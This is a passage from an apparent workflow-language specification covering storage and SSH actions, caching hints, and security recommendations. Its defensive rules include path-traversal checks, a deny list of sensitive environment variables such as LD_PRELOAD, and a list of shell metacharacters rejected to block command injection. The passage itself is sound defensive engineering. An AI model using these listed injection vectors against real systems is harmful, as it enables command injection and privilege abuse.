    overwrite: true|false|CEL      # optional for put/copy/move/transfer (default: false)

    # For copy/move within same resolved URL authority:
    targetPath: "<CEL expression>"

    # For transfer (cross-storage):
    source:
      url: data                     # alias, literal URL, or CEL
      path: "<CEL expression>"
    target:
      url: "sftp://backup-host"     # alias, literal URL, or CEL
      path: "<CEL expression>"

    # For list pagination:
    cursor: "<CEL expression>"     # optional, pagination cursor from previous list
    limit: integer|CEL             # optional, page size

    # Cache hint (storage-only, advisory):
    cacheHint: "5m"                    # string shorthand: "<ttl>[/<revalidation>[/<scope>]]"
    cacheHint: { ttl: 5m, revalidation: CONDITIONAL, scope: LOCAL }  # object form
    cacheHint: true | false            # opt-in / opt-out

    # Universal action fields:
    condition: "<cel-expression>"
    timeout: duration
    retry: ...
    rateLimit: ...
    circuitBreaker: ...
    async: false
    result: ...
    onYield: ...
    errors: [StorageError, ...]
    rollback: [...]
    catch: ...
```

**`path:`** -- CEL expression for the relative file/directory path within the storage endpoint. Optional for single-URL operations (when the full path is included in `url:`); REQUIRED when `url:` is an alias or a base URL without a path component. **Path validation:** The engine MUST validate paths against traversal attacks. Validation MUST occur after all decoding and normalization (URL decoding, Unicode normalization, backslash-to-forward-slash conversion on Windows). The engine MUST reject paths containing: `..` path segments (in any encoding), null bytes (in any encoding), backslash characters on non-Windows providers, and control characters (U+0000-U+001F). For local filesystem providers, the engine MUST resolve the final path to its canonical absolute form and verify it falls within the configured storage root directory; symlink targets MUST be resolved before this check. Provider-specific path rules: S3 keys MUST NOT start with `/` or contain `//`; SFTP/SMB/FTP paths follow POSIX rules after normalization. SA-STORAGE-17 (ERROR) rejects path expressions containing URL-encoded sequences (`%2f`, `%2e`, `%00`) that decode to traversal characters.

**Symlink resolution and TOCTOU prevention.** Engines MUST resolve symlinks atomically using `O_NOFOLLOW` (or platform equivalent: `FILE_FLAG_OPEN_REPARSE_POINT` on Windows, `O_SYMLINK` on macOS) and `openat()` for directory-relative opens. The engine MUST use the file descriptor obtained during the open-and-verify step for all subsequent I/O — MUST NOT re-open the path. The double-check fallback (resolve-verify-open-verify) is NOT acceptable as it remains vulnerable to race conditions between the second verify and the I/O operation. The engine MUST also verify that no path component (not just the final component) is a symlink pointing outside the storage root. *(CWE-367)*

**`data:`** -- CEL expression providing file content for `put`. Accepts: BINARY (raw bytes), STRING/TEXT (auto-encoded to bytes via charset), MAP/ARRAY (auto-serialized — format inferred from `path` extension, or raises `EncodeError` if ambiguous), or a RESOURCES handle (engine auto-extracts `$value` for content and preserves `$name` for filename hints — same pattern as `mail` attachments). When `data` is `=RESOURCES.config`, it is equivalent to `=meta(RESOURCES.config).value` in this context.

**`parseAs:`** -- optional content type for auto-parsing on `get` results. Two forms:

- **String form:** bare constant (`JSON`, `YAML`, `XML`, `CSV`, `TSV`, `TEXT`, `BINARY`) or CEL `=` expression.
- **Object form:** `{ $kind?: JSON|..., $type?: ..., $name?: ... }` — at least one field required. `$kind` acts as both parse format and result kind annotation (same values as string form); `$type` attaches a semantic MIME type (e.g., `application/vnd.api+json`); `$name` carries a filename through to a later `mail` attachment or `storage put`.

When present, `RESULT.data` is auto-parsed. When absent, `RESULT.data` is raw bytes (BINARY). Parse failure raises `ParseError` with `ERROR.DATA.field: "data"`.

**`overwrite:`** -- default `false` to prevent accidental data loss. When `false` and target exists, raises `StorageError` with `ERROR.DATA.reason: "already_exists"`. Explicit `overwrite: true` is REQUIRED to replace existing files.

**Result shapes:**

`get`:
```
RESULT.data       -- file content (raw bytes, or auto-decoded if parseAs set)
RESULT.name       -- STRING: filename (last path component)
RESULT.size       -- INTEGER: content length in bytes
RESULT.type       -- STRING: MIME content type (inferred or server-provided)
RESULT.modified   -- STRING: last modified timestamp (ISO 8601)
RESULT.etag       -- STRING: ETag/checksum if provided (null otherwise)
RESULT.metadata   -- MAP: provider-specific metadata (S3 user metadata, etc.)
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .hit            -- BOOLEAN: true if served from cache
  .stale          -- BOOLEAN: true if served stale (revalidating or error fallback)
  .age            -- INTEGER: seconds since cache entry creation
  .source         -- STRING: ORIGIN | CACHE | STALE_REVALIDATING | STALE_ERROR
  .revalidated    -- BOOLEAN: true if conditional GET confirmed freshness
  .negativeHit    -- BOOLEAN: true if this is a cached "not found" result
```

`put`:
```
RESULT.path       -- STRING: full remote path of uploaded file
RESULT.size       -- INTEGER: bytes written
RESULT.etag       -- STRING: ETag/checksum if provided (null otherwise)
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .invalidated    -- INTEGER: number of cache entries invalidated
```

`list`:
```
RESULT.entries    -- ARRAY of MAP, each with:
  .name           -- STRING (filename/dirname)
  .path           -- STRING (full remote path)
  .size           -- INTEGER (bytes, 0 for directories)
  .type           -- STRING ("file" or "directory")
  .modified       -- STRING (ISO 8601 timestamp)
RESULT.truncated  -- BOOLEAN (true if more results available)
RESULT.cursor     -- STRING (pagination cursor, null if not truncated)
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .hit            -- BOOLEAN
  .stale          -- BOOLEAN
  .age            -- INTEGER (seconds)
  .source         -- STRING: ORIGIN | CACHE | STALE_REVALIDATING | STALE_ERROR
  .revalidated    -- BOOLEAN
```

`info`:
```
RESULT.name       -- STRING: filename
RESULT.path       -- STRING: full remote path
RESULT.size       -- INTEGER: content length in bytes
RESULT.type       -- STRING: MIME content type
RESULT.modified   -- STRING: ISO 8601 timestamp
RESULT.etag       -- STRING: ETag/checksum
RESULT.metadata   -- MAP: provider-specific metadata
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .hit            -- BOOLEAN
  .stale          -- BOOLEAN
  .age            -- INTEGER (seconds)
  .source         -- STRING: ORIGIN | CACHE | STALE_REVALIDATING | STALE_ERROR
  .revalidated    -- BOOLEAN
  .negativeHit    -- BOOLEAN
```

`exists`:
```
RESULT.exists     -- BOOLEAN
RESULT.cache      -- MAP (null when caching inactive/unsupported):
  .hit            -- BOOLEAN
  .stale          -- BOOLEAN
  .age            -- INTEGER (seconds)
  .source         -- STRING: ORIGIN | CACHE | STALE_REVALIDATING | STALE_ERROR
  .revalidated    -- BOOLEAN
  .negativeHit    -- BOOLEAN
```

`delete`: `RESULT.path` -- STRING: full remote path. `RESULT.cache` -- MAP (null when caching inactive/unsupported): `.invalidated` -- INTEGER.

`mkdir`: `RESULT.path` -- STRING: full remote path.

`copy` / `move`: `RESULT.sourcePath`, `RESULT.targetPath` -- STRING. `RESULT.size` -- INTEGER. `RESULT.cache` -- MAP (null when caching inactive/unsupported): `.invalidated` -- INTEGER.

`transfer`: `RESULT.size` -- INTEGER: bytes transferred. `RESULT.sourcePath`, `RESULT.targetPath` -- STRING. `RESULT.cache` -- MAP (null when caching inactive/unsupported): `.invalidated` -- INTEGER.

**Transfer operation (cross-storage):**

```yaml
- storage:
    operation: transfer
    source:
      url: data
      path: "/data/export.csv"
    target:
      url: "sftp://backup.host"
      path: "/backups/export.csv"
    overwrite: true
    timeout: 30m
    result: { bytes: =RESULT.size }
```

The engine implements `transfer` as a bounded-buffer streaming pipe between two backend instances — the source writes, the target reads, without materializing the entire file in memory. Both `source.url` and `target.url` MUST resolve to backends declared in `requires.STORAGE` with appropriate operations (`get` on source, `put` on target). On source error: target write is aborted, partial file cleaned up by provider. On target error: source read is cancelled. Engine-configurable maximum transfer size (default: 1 GB) — exceeding raises `ResourceExhaustedError`. For `transfer`, `url:`, `path:`, `data:`, and `parseAs:` are INVALID at the top level — SA-STORAGE-7 (ERROR).

Cross-authority `copy`/`move` are NOT supported — SA-STORAGE-6 (ERROR). Use `transfer` + `delete` for cross-authority moves.

**Streaming:** `get` supports `onYield:` / `$yields` for large file downloads. `list` supports `onYield:` for large directory listings. `transfer` supports `onYield:` for progress updates. Streaming operations are exempt from total transfer size limit but each chunk is subject to per-instance memory limit.

**Usage patterns:**

RESOURCES to S3 (alias):
```yaml
- storage:
    url: s3_archive                # bare alias
    operation: put
    path: ="uploads/" + meta(RESOURCES.config).name
    data: =RESOURCES.config
```

S3 JSON to parsed variable (literal URL):
```yaml
- storage:
    url: "s3://config-bucket"      # literal URL
    operation: get
    path: "config/settings.json"
    parseAs: JSON
    result: { settings: =RESULT.data }
# settings is now a MAP, ready for CEL access
```

Download, transform, re-upload (alias):
```yaml
- storage:
    url: data
    operation: get
    path: "raw/events.csv"
    parseAs: CSV
    result: { events: =RESULT.data }
- set:
    filtered: =events.filter(e, e.status == "active")
- storage:
    url: data
    operation: put
    path: "processed/active_events.csv"
    data: =filtered
```

**Errors:** `StorageError`, `StoragePathError`, `ConnectionError`, `TimeoutError`, `TLSError`, `AuthenticationError`, `AccessDeniedError`, `NotFoundError`, `MissingCapabilityError`, `ResourceExhaustedError`, `ParseError` (when `parseAs` fails).

**`cacheHint:`** -- advisory cache configuration for storage operations. Engines MAY implement caching at three conformance levels: **None** (parse & ignore — `RESULT.cache` is `null`), **Basic** (LOCAL scope TTL + EXACT invalidation), **Full** (all features). This directive provides **suggestions** to the engine — the engine may override, adjust, or ignore any cache hint based on its own policies, resource constraints, or operational requirements.

**String shorthand:** `"<ttl>[/<revalidation>[/<scope>]]"` — e.g., `"5m"`, `"5m/ALWAYS"`, `"5m/CONDITIONAL/GLOBAL"`. Grammar:

```
cacheHint-shorthand = ttl [ "/" revalidation [ "/" scope ] ]
ttl                 = 1*DIGIT duration-suffix
duration-suffix     = "ms" / "s" / "m" / "h" / "d"
revalidation        = "CONDITIONAL" / "ALWAYS" / "NEVER"
scope               = "LOCAL" / "CONTEXT" / "GLOBAL"
```

**Boolean form:** `cacheHint: true` — explicit opt-in, engine-determined defaults. `cacheHint: false` — explicit opt-out, author asserts this data MUST NOT be cached.

**Object form:**

```yaml
cacheHint:
  # --- READ-SIDE ---
  ttl: duration|integer|CEL             # suggested time-to-live (default: engine-determined)
  revalidation: CONDITIONAL|ALWAYS|NEVER # validation strategy (default: CONDITIONAL)
  staleWhileRevalidate: duration|integer|CEL  # serve stale during background refresh (default: 0)
  staleIfError: duration|integer|CEL    # serve stale on backend errors (default: 0)
  negative: true|false|CEL             # cache "not found" results (default: false)
  negativeTtl: duration|integer|CEL    # TTL for negative entries (default: 30s)
  scope: LOCAL|CONTEXT|GLOBAL          # cache sharing boundary (default: LOCAL)
  varyBy: "<cel-expression>"           # additional cache key partitioning
  maxSize: integer|CEL                 # max cacheable content size in bytes
  priority: LOW|NORMAL|HIGH           # eviction priority hint (default: NORMAL)
  warm: true|false|CEL                # pre-populate cache at flow load (default: false)

  # --- WRITE-SIDE ---
  invalidation: EXACT|PREFIX|NONE     # invalidation strategy (default: EXACT)
  invalidatePaths: [string|CEL, ...]  # additional paths to invalidate on write

  # --- CONSISTENCY ---
  readYourWrites: true|false|CEL      # intra-instance consistency (default: false)
```

**Property details:**

- **`ttl:`** -- suggested time-to-live for cached entries. Duration literal (e.g., `5m`, `1h`), integer milliseconds, or CEL expression. When omitted, the engine determines TTL. A value of `0` is not valid (use `cacheHint: false` to disable caching).
- **`revalidation:`** -- how the engine validates cached entries. `CONDITIONAL` (default): use conditional GET (ETag/If-Modified-Since for S3, mtime stat for SFTP/FTP, LastWriteTime for SMB, mtime+size for local). `ALWAYS`: always revalidate with backend before serving. `NEVER`: serve from cache without revalidation until TTL expires.
- **`staleWhileRevalidate:`** -- serve stale content while refreshing in the background. Duration/integer/CEL. Default: `0` (disabled).
- **`staleIfError:`** -- serve stale content when the backend returns an error. Duration/integer/CEL. Default: `0` (disabled). **Interaction with `retry:`** — when both `staleIfError` and `retry` are configured, the engine checks stale cache as a fast-path optimization before the first retry. If stale content is available and within the `staleIfError` window, it is served immediately. If no stale content is available (or the window has expired), retries proceed normally. After all retries are exhausted without success, `staleIfError` is checked again as a final fallback.
- **`negative:`** -- cache "not found" results for `get`, `info`, and `exists` operations. Boolean or CEL. Default: `false`.
- **`negativeTtl:`** -- TTL for negative cache entries. Duration/integer/CEL. Default: `30s`. Only meaningful when `negative: true`.
- **`scope:`** -- cache sharing boundary. `LOCAL` (default): per-flow-instance. `CONTEXT`: shared across instances within the same context (correlation ID). `GLOBAL`: shared across all instances (tenant-scoped per ENGINE §5.4 item 8).
- **`varyBy:`** -- CEL expression producing a string that is appended to the cache key. Used for partitioning (e.g., `=ENV.REGION` to cache per-region).
- **`maxSize:`** -- maximum content size in bytes that should be cached. Integer or CEL. Content larger than this is fetched from origin every time. Not applicable to `info` or `exists`.
- **`priority:`** -- eviction priority hint. `LOW`, `NORMAL` (default), `HIGH`. Engines MAY use this to influence eviction order.
- **`warm:`** -- pre-populate the cache at flow load time. Boolean or CEL. Default: `false`. Applicable to `get` and `info` only. SA-STORAGE-24 (INFO) warns when used with streaming `get` (may consume significant memory).
- **`invalidation:`** -- write-side invalidation strategy. `EXACT` (default): invalidate cache entries matching the exact path. `PREFIX`: invalidate all entries whose path starts with the written path. `NONE`: do not invalidate cache on write.
- **`invalidatePaths:`** -- additional paths to invalidate on write. Array of string literals or CEL expressions. SA-STORAGE-29 (WARN) flags user-controlled input in invalidation paths.
- **`readYourWrites:`** -- ensures that within a single flow instance, a read following a write to the same path returns the written data (not a stale cache entry). Boolean or CEL. Default: `false`. SA-STORAGE-26 (WARN) flags use with `async: true` (contradictory). SA-STORAGE-30 (WARN) flags use on `transfer` (cross-storage, ambiguous semantics).

**Per-operation applicability:**

| Operation | Read-Side | Write-Side | readYourWrites | warm |
|-----------|-----------|------------|----------------|------|
| `get` | All | -- | Yes | Yes |
| `info` | All (no maxSize) | -- | Yes | Yes |
| `exists` | All (no maxSize, no warm) | -- | Yes | -- |
| `list` | All (no negative, no warm) | -- | Yes | -- |
| `put` | -- | All | Yes | -- |
| `delete` | -- | All | Yes | -- |
| `copy` | -- | All | Yes | -- |
| `move` | -- | All | Yes | -- |
| `mkdir` | N/A | N/A | N/A | N/A |
| `transfer` | -- | invalidation, invalidatePaths | -- | -- |

**Defaults inheritance:** `cacheHint:` is eligible for `defaults:` with replace-not-merge semantics (same as `retry:`, `timeout:`). Omitting `cacheHint:` on a step inherits from defaults; `cacheHint: false` explicitly opts out. `cacheHint:` in `defaults:` is silently ignored by non-storage action steps.

**Key interactions:**

- **`parseAs:`** -- engine caches raw bytes; `parseAs` is applied after cache retrieval.
- **`onYield:`** -- compatible; engine MAY cache complete content after streaming finishes.
- **`async: true`** -- write-side invalidation is valid. `readYourWrites: true` is contradictory (SA-STORAGE-26). `cacheHint:` on `async: true` read operations is contradictory since the result is discarded (SA-STORAGE-25).
- **`retry:`** -- see `staleIfError` interaction above.
- **`condition: false`** -- no cache interaction occurs (step is skipped entirely).

---

#### `ssh` -- Remote Command Execution

Runs a command on a remote host via SSH. Capability-gated (deny-by-default). The flow addresses hosts by hostname or provisioned alias. The engine resolves aliases, credentials, and connection details. If the engine does not support SSH, it raises `UnsupportedProviderError` at flow load time.

**`host:`** -- SSH target. Three forms: (1) **bare alias** — engine-provisioned or parent-flow-provisioned name (e.g., `host: prod_server`); (2) **literal hostname** (`host: "prod.example.com"` or `host: "prod.example.com:2222"`); (3) **CEL expression** (`=` prefix, must evaluate to a hostname string). REQUIRED. Resolution order: CEL (`=` prefix) → literal hostname (contains `.` or `:`) → bare alias (matches `^[a-z][a-z0-9_]*$`).

> **SSH host validation.** When `ssh.host` is a CEL expression, the engine MUST evaluate the expression and validate the resolved hostname against the SSH capability's declared aliases and hostnames before establishing the connection. Connections to undeclared hosts MUST raise `MissingCapabilityError`. Static analysis rule SA-SSH-13 (ERROR) MUST flag `ssh.host` CEL expressions that reference user-controlled input. Note: SA-SSH-13 severity has been elevated to ERROR (the corresponding rule definition is in VALIDATION.md). *(CWE-918)*

```yaml
- ssh:
    _label_: "Human-readable"
    _id_: step_name
    host: prod_server              # bare alias (engine/parent-provisioned)
    host: "prod.example.com"       # literal hostname
    host: =ENV.SSH_HOST            # CEL expression
    command: "executable"          # REQUIRED. Static plain string (NOT CEL). For capability validation.
    args: ["arg1", =dynamic_arg]   # Optional. Array of CEL expressions.
    workingDir: "<CEL expression>" # Optional. Remote working directory.
    env: { KEY: =value }           # Optional. Environment variables injected on remote.
    stdin: "<CEL expression>"      # Optional. Data piped to remote command stdin.
    parseAs: JSON|YAML|XML|CSV|TSV|TEXT|BINARY|CEL   # string or object; Default: TEXT. Auto-parse stdout.
    # parseAs: {$kind: JSON, $type: ..., $name: ...}              # object form
    charset: plain                 # Optional charset override for stdout.
    stderrCharset: plain           # Optional charset override for stderr.

    # Universal action fields:
    condition: "<cel-expression>"
    timeout: duration
    retry: ...
    rateLimit: ...
    circuitBreaker: ...
    async: false
    result: ...
    onYield: ...
    errors: [SshError, ...]
    rollback: [...]
    catch: ...
```

**`command:`** -- static plain string (same carve-out as `exec.command:` and `throw.error:`). NOT CEL. The engine validates it against the `SSH` capability allowlist. Shell metacharacters are rejected — SA-SSH-1 (ERROR). Schema-level enforcement: the `command` field rejects `=`-prefixed strings via the `^[^=]` pattern constraint. SA-SSH-1 (shell metacharacters) provides a parallel structural enforcement; SA-SSH-2 (command not in allowlist) provides additional static analysis protection.

**`args:`** -- array where each string item is a CEL expression (same as `exec.args:`). The engine constructs the remote command by joining `command` + individually POSIX-shell-escaped `args`. Each argument is single-quoted with internal single-quotes escaped as `'\''`. This prevents shell injection on the remote host.

**`env:`** -- environment variables prepended to the remote command as `env KEY1='val1' KEY2='val2' <command> <args>` (also POSIX-escaped). Secret values in `env:` are resolved at the action boundary (same as `exec.env:`).

**`stdin:`** -- data piped to the remote command's stdin via the SSH channel. Pipe closed after data is sent (same as `exec.stdin:`).

**`parseAs:`** -- auto-parse for stdout (primary output). Same semantics as `exec.parseAs:`: JSON/YAML/XML → structured value, CSV/TSV → list of maps, TEXT → string, BINARY → bytes. Default: `TEXT`. Two forms: string (`parseAs: JSON`) or object (`parseAs: { $kind?: JSON, $type?: ..., $name?: ... }`) — `$kind` sets parse format and result kind; `$type`/`$name` attach metadata. Stderr is always TEXT — decode manually via CEL if needed.

**Output:** `RESULT.stdout` (stdout content, auto-decoded via `parseAs:`), `RESULT.stderr` (stderr, always TEXT), `RESULT.exitCode` (INTEGER: remote process exit code).

**Auto-throw:** Non-zero exit → `SshError` (when `exitCode` not mapped in `result:`).

**Streaming:** stdout supported via `onYield:` / `$yields` (same as `exec`).

**Security model:**

1. **`command:` is static** — for capability allowlist validation. SA-SSH-2 (ERROR) rejects commands not in the allowlist.
2. **POSIX shell escaping is mandatory** — the engine MUST escape all arguments and env values. There is no "raw command string" mode.
3. **No shell operators in `command:`** — SA-SSH-1 (ERROR) rejects `command:` values containing `|`, `>`, `<`, `&&`, `||`, `;`, `$()`, backticks, or `\n`.
4. **No interactive sessions** — SSH action is strictly `exec` channel, never `shell` channel. No PTY allocation.
5. **Host key verification is mandatory** — follows from TLS verification principle (ENGINE.md §5.4 item 17). No option to disable per-flow.
6. **No port forwarding** — SSH action supports command execution only.
7. **Interpreter rejection** — SA-SSH-3 (ERROR) rejects SSH allowlists containing interpreter names (same as SA-EXEC-10).

**Documented limitation:** SSH commands are interpreted by the remote host's login shell. The engine provides POSIX single-quote escaping which is safe for all POSIX-compliant shells (bash, zsh, sh, dash, ksh). Non-POSIX remote shells (Windows `cmd.exe`, PowerShell) require a custom service provider via `call`.

**Shell escaping requirements.** Engines MUST apply POSIX shell escaping to ALL user-supplied values interpolated into SSH commands, including `ssh.args` items, `ssh.env` values, and any CEL-derived components. Single-quote wrapping with internal single-quote escaping (`'\''`) is the REQUIRED escaping strategy. The engine MUST NOT rely on double-quote escaping, which is vulnerable to variable expansion (`$VAR`), command substitution (`` `cmd` ``), and history expansion (`!`). The engine MUST reject any argument containing null bytes (`\0`). For arguments passed to `ssh.args`, the engine MUST perform escaping at the engine level immediately before SSH command construction — flow-level escaping is insufficient because intermediate processing may inadvertently unescape values. *(CWE-78)*

**Environment variable injection prevention.** Environment variable names derived from user input MUST be validated against a safe pattern (`[A-Z_][A-Z0-9_]*`, max 256 chars). Environment variable values derived from user input MUST NOT contain null bytes. Engines MUST deny setting security-sensitive environment variables (`LD_PRELOAD`, `LD_LIBRARY_PATH`, `DYLD_LIBRARY_PATH`, `PATH`, `HOME`, `SHELL`, `IFS`, `CDPATH`, `ENV`, `BASH_ENV`, `PYTHONPATH`, `NODE_PATH`, `RUBYLIB`, `PERL5LIB`, `CLASSPATH`) from user-controlled sources. When `ssh.env` values are derived from CEL expressions referencing user-controlled input, the engine MUST validate that environment variable names conform to `^[A-Z_][A-Z0-9_]{0,254}$` and that values do not contain null bytes. Static analysis rule SA-SSH-12 MUST flag `env` entries where the key or value references user-controlled input without validation. *(CWE-426: Untrusted Search Path)*

**Errors:** `SshError`, `ConnectionError`, `TimeoutError`, `TLSError`, `AuthenticationError`, `AccessDeniedError`, `MissingCapabilityError`.

---

### 4.7 Validation Rules

Action contract validation: required/optional params, output mapping, error checking. See `FLOWMARKUP-VALIDATION.md` AC rules.

---

## 5. Engine Implementation

Engine architecture, security model, static analysis, observability, audit logging, tooling, and testing requirements are specified in **[FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md)**. Section numbers (§5–§7) are preserved in that document for cross-reference continuity.

---

## 6. Tooling

See [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §6 for flow file URL resolution requirements.

---

## 7. Testing

See [FLOWMARKUP-ENGINE.md](FLOWMARKUP-ENGINE.md) §7 and [FLOWMARKUP-TESTING.md](FLOWMARKUP-TESTING.md) for the full testing framework specification.

---

## 8. Recommendations

This section provides advisory best-practice guidance for flow authors. All recommendations use SHOULD language — they are not normative requirements but represent patterns that produce more reliable, maintainable, and secure flows. Each recommendation has a citable `R-XX-N` identifier (mirroring SA-rule naming) and cross-references the SA rules that enforce related constraints.

### 8.1 Security (R-SEC-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-SEC-1 | Use `SECRET.*` for all credentials (API keys, passwords, tokens, certs, connection strings); reserve `ENV.*` for non-sensitive config (hostnames, ports, feature flags, base URLs) | `SECRET.*` provides mandatory redaction (MUST vs SHOULD), opaque handles preventing leakage, pluggable backends, and typed credentials. `ENV.*` values are plain strings that can be logged, assigned, and returned. See [FLOWMARKUP-SECRETS.md](FLOWMARKUP-SECRETS.md) §2.3 comparison table |
| R-SEC-2 | Inject secrets into `exec` via `env:`, never via `args:` | Command-line arguments are visible in `ps`, `/proc/cmdline`, and audit logs. Environment variables are process-private. SA-SECRET-17 enforces this |
| R-SEC-3 | Grant least-privilege capabilities to sub-flows — name specific secrets, hosts, commands in `cap:` | Monotonically decreasing capability model limits blast radius. Prefer explicit `cap:` restrictions over `cap: INHERIT`. SA-CAP-3 flags `SECRET: INHERIT` when explicit enumeration is possible |
| R-SEC-4 | Pin remote sub-flow integrity with `integrity: sha256-...` and use commit SHA `?ref=` | Remote flows should use `integrity:` hashes for tamper detection. SA-RUN-2 (remote flow without `integrity:`), SA-RUN-11 (mutable `?ref=` without `integrity:`) |
| R-SEC-5 | Never log, return, or interpolate `SECRET.*` values — log the key name instead | `SecretValue` is opaque by design. SA-SECRET-3 (log), SA-SECRET-16 (URL), SA-SECRET-20 (template interpolation) all enforce this. Write `log: "Using credential SECRET.api_key"` not `log: "Token: {{SECRET.api_key}}"` |
| R-SEC-6 | Declare explicit `REQUEST` origin patterns in `requires:` | `INHERIT` is invalid on `requires:` — flows MUST use `REQUEST: ["api.example.com"]` or similar explicit patterns. SA-REQ-10 (ERROR). `INHERIT` is only valid on `cap:` (SA-REQ-9 warns on `cap: { REQUEST: INHERIT }`) |
| R-SEC-7 | Restrict `MAIL` capability to specific domains/addresses when possible | `MAIL: true` grants unrestricted sending. Use `MAIL: ["@example.com"]` to limit blast radius |
| R-SEC-8 | Declare explicit `EXEC` executable names in `requires:` | `INHERIT` is invalid on `requires:` — flows MUST use `EXEC: ["git", "python3"]` or similar explicit lists. SA-EXEC-8 (ERROR). `INHERIT` is only valid on `cap:` (SA-EXEC-9 warns on `cap: { EXEC: INHERIT }`) |
| R-SEC-9 | Use static lock names — avoid CEL expressions in `lock.name` | Dynamic lock names risk registry exhaustion. If dynamic names are needed, bound the cardinality |
| R-SEC-10 | Validate all user input before incorporating into XPath expressions, `exec.args`, `ssh.args`, or `storage.path` | String concatenation with untrusted input enables injection attacks (CWE-643, CWE-78, CWE-22). Use `assert:` with `matches()` against strict allowlists. SA-XML-3, SA-EXEC-11, SA-SSH-10, SA-STORAGE-18 flag these patterns |
| R-SEC-11 | Never use `htmlRaw()` on unsanitized user input in `body.html:` | `htmlRaw()` bypasses auto-escaping — user input passed through it enables XSS (CWE-79). Sanitize via a service call or use default `{{ }}` interpolation (auto-escaped). SA-MAIL-15 flags this |
| R-SEC-12 | Verify taint annotations on derived variables — engine auto-propagation covers most cases | Taint propagates automatically through CEL expressions: any expression that reads a tainted variable produces a tainted result (see [FLOWMARKUP-SECRETS.md](FLOWMARKUP-SECRETS.md) §7.4). SA-TAINT-5a (ERROR) flags variables derived from tainted sources that lose their taint due to engine-opaque operations (e.g., external service calls returning credentials). SA-TAINT-5b (ERROR) flags `$declassify` annotations applied without a recognised one-way transform. Manual `$exportable: false` or `$secret: true` annotations remain useful for values that enter the flow already tainted but are not read from `SECRET.*` (e.g., credentials returned by an action) |

Example (R-SEC-1):
```yaml
# Correct — credential via SECRET
services:
  db:
    provider: progralink.clients.db.postgres
    properties:
      host: =ENV.DB_HOST          # non-sensitive config
      port: 5432                   # literal
      password: =SECRET.db_password # credential
```

```yaml
# Wrong — credential via ENV (leakable, SHOULD-only redaction)
      password: =ENV.DB_PASSWORD
```

### 8.2 Error Handling (R-ERR-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-ERR-1 | Use `catch:` for single-step inline recovery; `try/catch` for multi-step error handling | `catch:` desugars to `try/catch` but keeps the flow flatter when only one step needs a handler. SA-ERR-7: mutually exclusive with `rollback:` |
| R-ERR-2 | Define error hierarchies with `$parent:` and catch the parent type for family handling | Avoids duplicating handlers. Catching `PaymentError` catches all descendants (`PaymentDeclinedError`, `PaymentTimeoutError`). Catch ordering: most-specific first |
| R-ERR-3 | Exclude non-retryable errors from retry via `nonRetryable:` | Retrying `ValidationError` or `AuthenticationError` wastes resources and delays failure reporting. See the retryable/non-retryable table in §4.1 |
| R-ERR-4 | Always include error context in catch handlers — log `ERROR.TYPE` and `ERROR.MESSAGE` | Bare `default: [- log: "Failed"]` loses diagnostic information. Include `"{{ERROR.TYPE}}: {{ERROR.MESSAGE}}"` |
| R-ERR-5 | Distinguish `RolledBackError` from `RollbackFailedError` in saga catch blocks | `RolledBackError` = all compensation succeeded (safe). `RollbackFailedError` = partial compensation (requires manual intervention/alert) |

### 8.3 Resilience (R-RES-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-RES-1 | Set `timeout:` on every external action step; use `defaults: { timeout: }` as a safety net | Without a timeout, a hung service blocks the flow instance indefinitely. Set action timeout < group timeout < flow timeout |
| R-RES-2 | Use `EXPONENTIAL` backoff with jitter for retry | FIXED/LINEAR retry creates thundering-herd effects when multiple instances retry simultaneously. EXPONENTIAL defaults to `jitter: true` (25%). Use `FIXED` only for known-constant recovery times |
| R-RES-3 | Use `circuitBreaker:` at GLOBAL scope to protect shared downstream services | Without a circuit breaker, all flow instances hammer a failing service, preventing recovery. Use `nonCountable:` to exclude non-indicative errors (e.g., `ValidationError`) |
| R-RES-4 | Use `rateLimit:` to enforce external API quotas — GLOBAL scope for system-wide limits, LOCAL for per-instance | `rateLimit:` with WAIT strategy queues excess requests; REJECT raises `RateLimitError` immediately |
| R-RES-5 | Store resilience policies in `const:` and reference via CEL to eliminate duplication | `const: { STD_RETRY: {maxAttempts: 3, delay: 2s, backoff: EXPONENTIAL} }` then `retry: =STD_RETRY` on each step. |

Example (R-RES-1 + R-RES-5):
```yaml
# Flow-level defaults eliminate per-step duplication
defaults:
  timeout: 30s              # R-RES-1: safety-net timeout
  retry: "3/2s/EXPONENTIAL"  # R-RES-5: string shorthand

do:
- call:
    service: payment
    operation: charge
    timeout: 10s             # override: payment is faster
    retry:                   # override: add nonRetryable to base policy
      maxAttempts: 3
      delay: 2s
      backoff: EXPONENTIAL
      nonRetryable: [PaymentDeclinedError, AuthenticationError]
    circuitBreaker:
      name: payment_charge
      threshold: 5
      window: 1m
      scope: GLOBAL
```

Note: step-level `retry:` replaces (not merges) the default, so the full policy must be restated when adding `nonRetryable:`. Alternatively, define a separate const for this specific policy.

### 8.4 Data Element Scope Selection (R-SCOPE-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-SCOPE-1 | Default to LOCAL scope for all flow computation | LOCAL variables are isolated per flow instance — no concurrency concerns, no cross-flow leakage |
| R-SCOPE-2 | Use `CONTEXT.*` for correlation data shared across the execution chain | CONTEXT propagates automatically to synchronous sub-flows and is deep-cloned for async sub-flows — ideal for `correlation_id`, `tenant_id`, user context |
| R-SCOPE-3 | Use `GLOBAL.*` only for system-wide shared state — always wrap read-modify-write with `lock:` | Individual GLOBAL writes are atomic but read-modify-write is NOT transactional (last-writer-wins). Without `lock:`, concurrent flows can overwrite each other |
| R-SCOPE-4 | Use `const:` for immutable flow-level values, or `$readonly: true` in `vars:`/`set:` for computed readonly values that need access to `vars:` or other `const:` names; `vars:` for mutable runtime state | `const:` for configuration, thresholds, retry policies, secret references. `$readonly: true` for computed values that should not change after assignment. `vars:` for counters, accumulators, intermediate results. `const:` and `$readonly` enforce immutability via SA-CONST-1 |

Example (R-SCOPE-3):
```yaml
# Safe read-modify-write on GLOBAL
- lock:
    name: request_counter
    scope: GLOBAL
    timeout: 5s
    do:
    - set: { GLOBAL.request_count: =GLOBAL.request_count + 1 }
```

### 8.5 Concurrency and Data Integrity (R-CONC-\*)

| ID | Rule | Rationale |
|---|---|---|
